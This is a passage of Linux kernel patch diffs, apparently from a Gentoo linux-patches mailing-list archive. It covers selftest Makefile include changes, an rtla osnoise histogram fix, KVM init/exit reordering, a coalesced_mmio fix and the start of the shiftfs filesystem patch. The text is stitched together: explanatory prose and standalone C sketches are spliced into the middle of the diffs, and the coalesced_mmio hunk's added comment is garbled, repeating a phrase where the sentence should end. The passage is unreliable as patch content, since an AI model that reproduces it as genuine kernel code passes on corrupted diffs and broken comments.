++++ b/tools/testing/selftests/powerpc/security/Makefile
+@@ -5,7 +5,7 @@ TEST_PROGS := mitigation-patching.sh
+ 
+ top_srcdir = ../../../../..
+ 
+-CFLAGS += -I../../../../../usr/include
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ include ../../lib.mk
+ 
+diff --git a/tools/testing/selftests/powerpc/syscalls/Makefile b/tools/testing/selftests/powerpc/syscalls/Makefile
+index b63f8459c704e..d1f2648b112b6 100644
+--- a/tools/testing/selftests/powerpc/syscalls/Makefile
++++ b/tools/testing/selftests/powerpc/syscalls/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ TEST_GEN_PROGS := ipc_unmuxed rtas_filter
+ 
+-CFLAGS += -I../../../../../usr/include
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ top_srcdir = ../../../../..
+ include ../../lib.mk
+diff --git a/tools/testing/selftests/powerpc/tm/Makefile b/tools/testing/selftests/powerpc/tm/Makefile
+index 5881e97c73c13..3876805c2f312 100644
+--- a/tools/testing/selftests/powerpc/tm/Makefile
++++ b/tools/testing/selftests/powerpc/tm/Makefile
+@@ -17,7 +17,7 @@ $(TEST_GEN_PROGS): ../harness.c ../utils.c
+ CFLAGS += -mhtm
+ 
+ $(OUTPUT)/tm-syscall: tm-syscall-asm.S
+-$(OUTPUT)/tm-syscall: CFLAGS += -I../../../../../usr/include
++$(OUTPUT)/tm-syscall: CFLAGS += $(KHDR_INCLUDES)
+ $(OUTPUT)/tm-tmspr: CFLAGS += -pthread
+ $(OUTPUT)/tm-vmx-unavail: CFLAGS += -pthread -m64
+ $(OUTPUT)/tm-resched-dscr: ../pmu/lib.c
+diff --git a/tools/testing/selftests/ptp/Makefile b/tools/testing/selftests/ptp/Makefile
+index ef06de0898b73..eeab44cc68638 100644
+--- a/tools/testing/selftests/ptp/Makefile
++++ b/tools/testing/selftests/ptp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_PROGS := testptp
+ LDLIBS += -lrt
+ all: $(TEST_PROGS)
+diff --git a/tools/testing/selftests/rseq/Makefile b/tools/testing/selftests/rseq/Makefile
+index 215e1067f0376..3a173e184566c 100644
+--- a/tools/testing/selftests/rseq/Makefile
++++ b/tools/testing/selftests/rseq/Makefile
+@@ -4,7 +4,7 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
+-CFLAGS += -O2 -Wall -g -I./ -I../../../../usr/include/ -L$(OUTPUT) -Wl,-rpath=./ \
++CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -L$(OUTPUT) -Wl,-rpath=./ \
+ 	  $(CLANG_FLAGS)
+ LDLIBS += -lpthread -ldl
+ 
+diff --git a/tools/testing/selftests/sched/Makefile b/tools/testing/selftests/sched/Makefile
+index 10c72f14fea9d..099ee9213557a 100644
+--- a/tools/testing/selftests/sched/Makefile
++++ b/tools/testing/selftests/sched/Makefile
+@@ -4,7 +4,7 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
+-CFLAGS += -O2 -Wall -g -I./ -I../../../../usr/include/  -Wl,-rpath=./ \
++CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -Wl,-rpath=./ \
+ 	  $(CLANG_FLAGS)
+ LDLIBS += -lpthread
+ 
+diff --git a/tools/testing/selftests/seccomp/Makefile b/tools/testing/selftests/seccomp/Makefile
+index f017c382c0369..584fba4870372 100644
+--- a/tools/testing/selftests/seccomp/Makefile
++++ b/tools/testing/selftests/seccomp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -isystem ../../../../usr/include/
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDFLAGS += -lpthread
+ LDLIBS += -lcap
+ 
+diff --git a/tools/testing/selftests/sync/Makefile b/tools/testing/selftests/sync/Makefile
+index d0121a8a3523a..df0f91bf6890d 100644
+--- a/tools/testing/selftests/sync/Makefile
++++ b/tools/testing/selftests/sync/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ CFLAGS += -O2 -g -std=gnu89 -pthread -Wall -Wextra
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ LDFLAGS += -pthread
+ 
+ .PHONY: all clean
+diff --git a/tools/testing/selftests/user_events/Makefile b/tools/testing/selftests/user_events/Makefile
+index c765d8635d9af..87d54c6400681 100644
+--- a/tools/testing/selftests/user_events/Makefile
++++ b/tools/testing/selftests/user_events/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -I../../../../usr/include
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDLIBS += -lrt -lpthread -lm
+ 
+ TEST_GEN_PROGS = ftrace_test dyn_test perf_test
+diff --git a/tools/testing/selftests/vm/Makefile b/tools/testing/selftests/vm/Makefile
+index 163c2fde3cb3a..192ea3725c5c8 100644
+--- a/tools/testing/selftests/vm/Makefile
++++ b/tools/testing/selftests/vm/Makefile
+@@ -23,7 +23,7 @@ MACHINE ?= $(shell echo $(uname_M) | sed -e 's/aarch64.*/arm64/' -e 's/ppc64.*/p
+ # LDLIBS.
+ MAKEFLAGS += --no-builtin-rules
+ 
+-CFLAGS = -Wall -I $(top_srcdir) -I $(top_srcdir)/usr/include $(EXTRA_CFLAGS) $(KHDR_INCLUDES)
++CFLAGS = -Wall -I $(top_srcdir) $(EXTRA_CFLAGS) $(KHDR_INCLUDES)
+ LDLIBS = -lrt -lpthread
+ TEST_GEN_FILES = compaction_test
+ TEST_GEN_FILES += gup_test
+diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
+index 0388c4d60af0e..ca9374b56ead1 100644
+--- a/tools/testing/selftests/x86/Makefile
++++ b/tools/testing/selftests/x86/Makefile
+@@ -34,7 +34,7 @@ BINARIES_64 := $(TARGETS_C_64BIT_ALL:%=%_64)
+ BINARIES_32 := $(patsubst %,$(OUTPUT)/%,$(BINARIES_32))
+ BINARIES_64 := $(patsubst %,$(OUTPUT)/%,$(BINARIES_64))
+ 
+-CFLAGS := -O2 -g -std=gnu99 -pthread -Wall
++CFLAGS := -O2 -g -std=gnu99 -pthread -Wall $(KHDR_INCLUDES)
+ 
+ # call32_from_64 in thunks.S uses absolute addresses.
+ ifeq ($(CAN_BUILD_WITH_NOPIE),1)
+diff --git a/tools/tracing/rtla/src/osnoise_hist.c b/tools/tracing/rtla/src/osnoise_hist.c
+index 5d7ea479ac89f..fe34452fc4ec0 100644
+--- a/tools/tracing/rtla/src/osnoise_hist.c
++++ b/tools/tracing/rtla/src/osnoise_hist.c
+@@ -121,6 +121,7 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ {
+ 	struct osnoise_hist_params *params = tool->params;
+ 	struct osnoise_hist_data *data = tool->data;
++	unsigned long long total_duration;
+ 	int entries = data->entries;
+ 	int bucket;
+ 	int *hist;
+@@ -131,10 +132,12 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ 	if (data->bucket_size)
+ 		bucket = duration / data->bucket_size;
+ 
++	total_duration = duration * count;
++
+ 	hist = data->hist[cpu].samples;
+ 	data->hist[cpu].count += count;
+ 	update_min(&data->hist[cpu].min_sample, &duration);
+-	update_sum(&data->hist[cpu].sum_sample, &duration);
++	update_sum(&data->hist[cpu].sum_sample, &total_duration);
+ 	update_max(&data->hist[cpu].max_sample, &duration);
+ 
+ 	if (bucket < entries)
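+
+ The osnoise_hist fix above weights the running sum by the sample count:
+ a single record can stand for `count` identical samples, so adding the
+ bare duration undercounts the total. A minimal sketch of the accounting
+ difference, with hypothetical numbers:

#include <stdio.h>

struct hist {
	unsigned long long count;
	unsigned long long sum;
};

static void update(struct hist *h, unsigned long long duration,
		   unsigned long long count)
{
	h->count += count;
	h->sum += duration * count;	/* the fix; was h->sum += duration */
}

int main(void)
{
	struct hist h = { 0, 0 };

	update(&h, 10, 3);	/* one record covering three 10us samples */
	printf("avg = %llu\n", h.sum / h.count);	/* prints 10 */
	return 0;
}

+ With the old `sum += duration` the average for this record would come
+ out as 10/3 rather than 10.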
+diff --git a/virt/kvm/coalesced_mmio.c b/virt/kvm/coalesced_mmio.c
+index 0be80c213f7f2..5ef88f5a08640 100644
+--- a/virt/kvm/coalesced_mmio.c
++++ b/virt/kvm/coalesced_mmio.c
+@@ -187,15 +187,17 @@ int kvm_vm_ioctl_unregister_coalesced_mmio(struct kvm *kvm,
+ 			r = kvm_io_bus_unregister_dev(kvm,
+ 				zone->pio ? KVM_PIO_BUS : KVM_MMIO_BUS, &dev->dev);
+ 
++			kvm_iodevice_destructor(&dev->dev);
++
+ 			/*
+ 			 * On failure, unregister destroys all devices on the
+ 			 * bus _except_ the target device, i.e. coalesced_zones
+-			 * has been modified.  No need to restart the walk as
+-			 * there aren't any zones left.
++			 * has been modified.  Bail after destroying the target
++			 * device, there's no need to restart the walk as there
++			 * has been modified.  Bail after destroying the target
+ 			 */
+ 			if (r)
+ 				break;
+-			kvm_iodevice_destructor(&dev->dev);
+ 		}
+ 	}
+ 
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index fab4d37905785..3a3c1bc3e303f 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -5935,12 +5935,6 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 
+ 	kvm_chardev_ops.owner = module;
+ 
+-	r = misc_register(&kvm_dev);
+-	if (r) {
+-		pr_err("kvm: misc device register failed\n");
+-		goto out_unreg;
+-	}
+-
+ 	register_syscore_ops(&kvm_syscore_ops);
+ 
+ 	kvm_preempt_ops.sched_in = kvm_sched_in;
+@@ -5949,11 +5943,24 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 	kvm_init_debug();
+ 
+ 	r = kvm_vfio_ops_init();
+-	WARN_ON(r);
++	if (WARN_ON_ONCE(r))
++		goto err_vfio;
++
++	/*
++	 * Registration _must_ be the very last thing done, as this exposes
++	 * /dev/kvm to userspace, i.e. all infrastructure must be set up!
++	 */
++	r = misc_register(&kvm_dev);
++	if (r) {
++		pr_err("kvm: misc device register failed\n");
++		goto err_register;
++	}
+ 
+ 	return 0;
+ 
+-out_unreg:
++err_register:
++	kvm_vfio_ops_exit();
++err_vfio:
+ 	kvm_async_pf_deinit();
+ out_free_4:
+ 	for_each_possible_cpu(cpu)
+@@ -5979,8 +5986,14 @@ void kvm_exit(void)
+ {
+ 	int cpu;
+ 
+-	debugfs_remove_recursive(kvm_debugfs_dir);
++	/*
++	 * Note, unregistering /dev/kvm doesn't strictly need to come first,
++	 * fops_get(), a.k.a. try_module_get(), prevents acquiring references
++	 * to KVM while the module is being stopped.
++	 */
+ 	misc_deregister(&kvm_dev);
++
++	debugfs_remove_recursive(kvm_debugfs_dir);
+ 	for_each_possible_cpu(cpu)
+ 		free_cpumask_var(per_cpu(cpu_kick_mask, cpu));
+ 	kmem_cache_destroy(kvm_vcpu_cache);


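The kvm_main.c portion of this patch illustrates a general init-ordering
rule: the call that makes a device visible to userspace (here
misc_register() for /dev/kvm) must come last, and the error labels must
unwind in exactly the reverse order of setup. A generic sketch of that
pattern, with placeholder names rather than KVM symbols:

#include <stdio.h>

static int init_a(void)       { puts("init a");  return 0; }
static void exit_a(void)      { puts("exit a"); }
static int init_b(void)       { puts("init b");  return 0; }
static void exit_b(void)      { puts("exit b"); }
static int register_dev(void) { puts("register"); return 0; }

static int module_init_sketch(void)
{
	int r;

	r = init_a();
	if (r)
		goto out;
	r = init_b();
	if (r)
		goto err_a;
	/* Last step: only now does the device become reachable. */
	r = register_dev();
	if (r)
		goto err_b;
	return 0;

err_b:
	exit_b();
err_a:
	exit_a();
out:
	return r;
}

int main(void) { return module_init_sketch(); }

kvm_exit() mirrors this by deregistering /dev/kvm first, as the comment
in the second hunk above notes.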
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-06 17:30 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-06 17:30 UTC (permalink / raw
  To: gentoo-commits

commit:     66dd8dbc053422be2cf35862fe70e7996615c0e8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Mar  6 17:29:51 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Mar  6 17:29:51 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=66dd8dbc

Add shifts back

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    4 +
 5000_shiftfs-6.1.patch | 2249 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2253 insertions(+)

diff --git a/0000_README b/0000_README
index dca64867..6e5b60b1 100644
--- a/0000_README
+++ b/0000_README
@@ -147,6 +147,10 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
+Patch:  5000_shiftfs-6.1.patch
+From:   https://github.com/toby63/shiftfs-dkms
+Desc:   Kernel fs for Linux that provides easier uid/gid-shifting for containers
+
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
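 
 Regarding the shiftfs Desc entry above: the uid/gid shifting amounts to
 translating an id out of one user-namespace mapping and into another,
 which the patch body below implements with shift_kuid()/shift_kgid() on
 top of from_kuid()/make_kuid(). A minimal userspace analogue, assuming
 simple linear ranges (the ranges and helper names are hypothetical):

#include <stdio.h>

struct idmap { unsigned base_inside, base_outside, count; };

/* kernel id -> namespace-local id (like from_kuid()) */
static long to_local(const struct idmap *m, unsigned kid)
{
	if (kid < m->base_outside || kid >= m->base_outside + m->count)
		return -1;	/* unmapped */
	return m->base_inside + (kid - m->base_outside);
}

/* namespace-local id -> kernel id (like make_kuid()) */
static long to_kernel(const struct idmap *m, unsigned uid)
{
	if (uid < m->base_inside || uid >= m->base_inside + m->count)
		return -1;
	return m->base_outside + (uid - m->base_inside);
}

int main(void)
{
	struct idmap from = { 0, 100000, 65536 };	/* container A */
	struct idmap to   = { 0, 200000, 65536 };	/* container B */
	long uid = to_local(&from, 100000);		/* -> 0 */
	long kid = to_kernel(&to, (unsigned)uid);	/* -> 200000 */

	printf("kuid 100000 -> uid %ld -> kuid %ld\n", uid, kid);
	return 0;
}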

diff --git a/5000_shiftfs-6.1.patch b/5000_shiftfs-6.1.patch
new file mode 100644
index 00000000..f0c715e3
--- /dev/null
+++ b/5000_shiftfs-6.1.patch
@@ -0,0 +1,2249 @@
+--- /dev/null	2023-03-06 07:06:05.852282227 -0500
++++ b/fs/shiftfs.c	2023-03-06 11:58:38.389647656 -0500
+@@ -0,0 +1,2203 @@
++#include <linux/btrfs.h>
++#include <linux/capability.h>
++#include <linux/cred.h>
++#include <linux/mount.h>
++#include <linux/fdtable.h>
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/magic.h>
++#include <linux/parser.h>
++#include <linux/security.h>
++#include <linux/seq_file.h>
++#include <linux/statfs.h>
++#include <linux/slab.h>
++#include <linux/user_namespace.h>
++#include <linux/uidgid.h>
++#include <linux/xattr.h>
++#include <linux/posix_acl.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/uio.h>
++#include <linux/fiemap.h>
++#include <linux/pagemap.h>
++
++struct shiftfs_super_info {
++	struct vfsmount *mnt;
++	struct user_namespace *userns;
++	/* creds of process who created the super block */
++	const struct cred *creator_cred;
++	bool mark;
++	unsigned int passthrough;
++	unsigned int passthrough_mark;
++};
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry);
++
++#define SHIFTFS_PASSTHROUGH_NONE 0
++#define SHIFTFS_PASSTHROUGH_STAT 1
++#define SHIFTFS_PASSTHROUGH_IOCTL 2
++#define SHIFTFS_PASSTHROUGH_ALL                                                \
++	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
++
++static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	return true;
++}
++
++static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	return true;
++}
++
++enum {
++	OPT_MARK,
++	OPT_PASSTHROUGH,
++	OPT_LAST,
++};
++
++/* global filesystem options */
++static const match_table_t tokens = {
++	{ OPT_MARK, "mark" },
++	{ OPT_PASSTHROUGH, "passthrough=%u" },
++	{ OPT_LAST, NULL }
++};
++
++static const struct cred *shiftfs_override_creds(const struct super_block *sb)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	return override_creds(sbinfo->creator_cred);
++}
++
++static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
++					       struct cred *newcred)
++{
++	revert_creds(oldcred);
++	put_cred(newcred);
++}
++
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
++}
++
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
++{
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
++
++static int shiftfs_override_object_creds(const struct super_block *sb,
++					 const struct cred **oldcred,
++					 struct cred **newcred,
++					 struct dentry *dentry, umode_t mode,
++					 bool hardlink)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
++
++	if (!hardlink) {
++		int err = security_dentry_create_files_as(dentry, mode,
++							  &dentry->d_name,
++							  *oldcred, *newcred);
++		if (err) {
++			shiftfs_revert_object_creds(*oldcred, *newcred);
++			return err;
++		}
++	}
++
++	put_cred(override_creds(*newcred));
++	return 0;
++}
++
++static void shiftfs_copyattr(struct inode *from, struct inode *to)
++{
++	struct user_namespace *from_ns = from->i_sb->s_user_ns;
++	struct user_namespace *to_ns = to->i_sb->s_user_ns;
++
++	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
++	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
++	to->i_mode = from->i_mode;
++	to->i_atime = from->i_atime;
++	to->i_mtime = from->i_mtime;
++	to->i_ctime = from->i_ctime;
++	i_size_write(to, i_size_read(from));
++}
++
++static void shiftfs_copyflags(struct inode *from, struct inode *to)
++{
++	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
++
++	inode_set_flags(to, from->i_flags & mask, mask);
++}
++
++static void shiftfs_file_accessed(struct file *file)
++{
++	struct inode *upperi, *loweri;
++
++	if (file->f_flags & O_NOATIME)
++		return;
++
++	upperi = file_inode(file);
++	loweri = upperi->i_private;
++
++	if (!loweri)
++		return;
++
++	upperi->i_mtime = loweri->i_mtime;
++	upperi->i_ctime = loweri->i_ctime;
++
++	touch_atime(&file->f_path);
++}
++
++static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
++				       char *options)
++{
++	char *p;
++	substring_t args[MAX_OPT_ARGS];
++
++	sbinfo->mark = false;
++	sbinfo->passthrough = 0;
++
++	while ((p = strsep(&options, ",")) != NULL) {
++		int err, intarg, token;
++
++		if (!*p)
++			continue;
++
++		token = match_token(p, tokens, args);
++		switch (token) {
++		case OPT_MARK:
++			sbinfo->mark = true;
++			break;
++		case OPT_PASSTHROUGH:
++			err = match_int(&args[0], &intarg);
++			if (err)
++				return err;
++
++			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
++				return -EINVAL;
++
++			sbinfo->passthrough = intarg;
++			break;
++		default:
++			return -EINVAL;
++		}
++	}
++
++	return 0;
++}
++
++static void shiftfs_d_release(struct dentry *dentry)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (lowerd)
++		dput(lowerd);
++}
++
++static struct dentry *shiftfs_d_real(struct dentry *dentry,
++				     const struct inode *inode)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (inode && d_inode(dentry) == inode)
++		return dentry;
++
++	lowerd = d_real(lowerd, inode);
++	if (lowerd && (!inode || inode == d_inode(lowerd)))
++		return lowerd;
++
++	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
++	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
++	return dentry;
++}
++
++static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (d_is_negative(lowerd) != d_is_negative(dentry))
++		return 0;
++
++	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
++
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
++
++		shiftfs_copyattr(loweri, inode);
++	}
++
++	return err;
++}
++
++static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (d_unhashed(lowerd) ||
++	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
++		return 0;
++
++	if (flags & LOOKUP_RCU)
++		return -ECHILD;
++
++	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
++		err = lowerd->d_op->d_revalidate(lowerd, flags);
++
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
++
++		shiftfs_copyattr(loweri, inode);
++	}
++
++	return err;
++}
++
++static const struct dentry_operations shiftfs_dentry_ops = {
++	.d_release	   = shiftfs_d_release,
++	.d_real		   = shiftfs_d_real,
++	.d_revalidate	   = shiftfs_d_revalidate,
++	.d_weak_revalidate = shiftfs_d_weak_revalidate,
++};
++
++static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
++				    struct delayed_call *done)
++{
++	const char *p;
++	const struct cred *oldcred;
++	struct dentry *lowerd;
++
++	/* RCU lookup not supported */
++	if (!dentry)
++		return ERR_PTR(-ECHILD);
++
++	lowerd = dentry->d_fsdata;
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	p = vfs_get_link(lowerd, done);
++	revert_creds(oldcred);
++
++	return p;
++}
++
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
++	revert_creds(oldcred);
++
++	shiftfs_copyattr(lowerd->d_inode, inode);
++
++	return err;
++}
++
++static int shiftfs_xattr_get(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, void *value, size_t size)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
++				 size_t size)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_listxattr(lowerd, list, size);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_removexattr(struct user_namespace *ns,
++			       struct dentry *dentry, const char *name)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_removexattr(&init_user_ns, lowerd, name);
++	revert_creds(oldcred);
++
++	/* update c/mtime */
++	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
++
++	return err;
++}
++
++static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct user_namespace *ns,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, const void *value, size_t size,
++			     int flags)
++{
++	if (!value)
++		return shiftfs_removexattr(&init_user_ns, dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++}
++
++static int shiftfs_inode_test(struct inode *inode, void *data)
++{
++	return inode->i_private == data;
++}
++
++static int shiftfs_inode_set(struct inode *inode, void *data)
++{
++	inode->i_private = data;
++	return 0;
++}
++
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++				 umode_t mode, const char *symlink,
++				 struct dentry *hardlink, bool excl)
++{
++	int err;
++	const struct cred *oldcred;
++	struct cred *newcred;
++	void *loweri_iop_ptr = NULL;
++	umode_t modei = mode;
++	struct super_block *dir_sb = diri->i_sb;
++	struct dentry *lowerd_new = dentry->d_fsdata;
++	struct inode *inode = NULL, *loweri_dir = diri->i_private;
++	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
++	struct dentry *lowerd_link = NULL;
++
++	if (hardlink) {
++		loweri_iop_ptr = loweri_dir_iop->link;
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			loweri_iop_ptr = loweri_dir_iop->mkdir;
++			break;
++		case S_IFREG:
++			loweri_iop_ptr = loweri_dir_iop->create;
++			break;
++		case S_IFLNK:
++			loweri_iop_ptr = loweri_dir_iop->symlink;
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			loweri_iop_ptr = loweri_dir_iop->mknod;
++			break;
++		}
++	}
++	if (!loweri_iop_ptr) {
++		err = -EINVAL;
++		goto out_iput;
++	}
++
++	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
++
++	if (!hardlink) {
++		inode = new_inode(dir_sb);
++		if (!inode) {
++			err = -ENOMEM;
++			goto out_iput;
++		}
++
++		/*
++		 * new_inode() will have added the new inode to the super
++		 * block's list of inodes. Further below we will call
++		 * inode_insert5(), which would perform the same operation again,
++		 * thereby corrupting the list. To avoid this, raise I_CREATING
++		 * in i_state, which will cause inode_insert5() to skip this
++		 * step. I_CREATING will be cleared by d_instantiate_new()
++		 * below.
++		 */
++		spin_lock(&inode->i_lock);
++		inode->i_state |= I_CREATING;
++		spin_unlock(&inode->i_lock);
++
++		inode_init_owner(&init_user_ns, inode, diri, mode);
++		modei = inode->i_mode;
++	}
++
++	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
++					    dentry, modei, hardlink != NULL);
++	if (err)
++		goto out_iput;
++
++	if (hardlink) {
++		lowerd_link = hardlink->d_fsdata;
++		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
++	} else {
++		switch (modei & S_IFMT) {
++		case S_IFDIR:
++			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
++			break;
++		case S_IFREG:
++			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
++			break;
++		case S_IFLNK:
++			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
++			break;
++		default:
++			err = -EINVAL;
++			break;
++		}
++	}
++
++	shiftfs_revert_object_creds(oldcred, newcred);
++
++	if (!err && WARN_ON(!lowerd_new->d_inode))
++		err = -EIO;
++	if (err)
++		goto out_iput;
++
++	if (hardlink) {
++		inode = d_inode(hardlink);
++		ihold(inode);
++
++		/* copy up times from lower inode */
++		shiftfs_copyattr(d_inode(lowerd_link), inode);
++		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
++		d_instantiate(dentry, inode);
++	} else {
++		struct inode *inode_tmp;
++		struct inode *loweri_new = d_inode(lowerd_new);
++
++		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
++					  shiftfs_inode_test, shiftfs_inode_set,
++					  loweri_new);
++		if (unlikely(inode_tmp != inode)) {
++			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
++			iput(inode_tmp);
++			err = -EINVAL;
++			goto out_iput;
++		}
++
++		ihold(loweri_new);
++		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
++				   0, lowerd_new);
++		d_instantiate_new(dentry, inode);
++	}
++
++	shiftfs_copyattr(loweri_dir, diri);
++	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
++		set_nlink(diri, loweri_dir->i_nlink);
++
